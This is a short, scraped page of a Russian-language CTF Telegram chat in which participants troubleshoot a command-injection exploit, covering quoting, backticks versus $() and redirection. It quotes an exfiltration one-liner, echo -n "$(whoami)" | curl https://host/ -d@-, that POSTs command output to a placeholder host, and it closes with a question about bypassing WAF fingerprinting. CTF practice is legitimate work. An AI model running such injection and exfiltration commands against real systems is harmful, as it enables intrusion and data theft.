Телеграмм чат группы ctfchat страница 1747

точно

15:02пожаловаться #1

ПП

лел

15:02пожаловаться #2

Milton Library Assis... in #ctfchat

Но он уже поставил в очередь

15:02пожаловаться #3

ПП

он же чекает еще даже до отправки

15:02пожаловаться #4

Milton Library Assis... in #ctfchat

Да

15:02пожаловаться #5

ПП

Pryanik

в одинарных пока пустота 🌚ща двойные

в двойных все работает ккста

15:03пожаловаться #6

в двойных все работает ккста

У меня нет,но видать ограничения сплоита(

15:04пожаловаться #7

ПП

Pryanik

У меня нет,но видать ограничения сплоита(

Ну по дефолту должно

15:07пожаловаться #8

ПП

Алсо можешь echo перенаправлять

15:07пожаловаться #9

ПП

Можешь попробовать `` вместо $()

15:07пожаловаться #10

Алсо можешь echo перенаправлять

Кстати и это не работает (

15:13пожаловаться #11

В итоге просто потом на сервере глянул кто файл создал %)

15:13пожаловаться #12

ПП

какой еще файл?

15:14пожаловаться #13

ПП

я про пайпы

15:14пожаловаться #14

ПП

echo -n "$(whoami)" | curl https://host/ -d@-
вот так можно POST послать

15:20пожаловаться #15

riven in #ctfchat

echo -n "$(whoami)" | curl https://host/ -d@-
вот так можно POST послать

Можно еще и грепать

15:20пожаловаться #16

riven in #ctfchat

Чтоб по красоте было

15:20пожаловаться #17

echo -n "$(whoami)" | curl https://host/ -d@-
вот так можно POST послать

curl blabla -o /tmp/file
потом зашел на сервер и написал ll /tmp
кавычки в сплоите нельзя видать( хотя мб два раза экранировать надо просто

16:23пожаловаться #18

mido.js in #ctfchat

does anyone know how to bypass WAFs (fingerprinting detection)?

20:48пожаловаться #19

mido.js in #ctfchat

Кто-нибудь знает, как обойти WAF (обнаружение отпечатков пальцев)?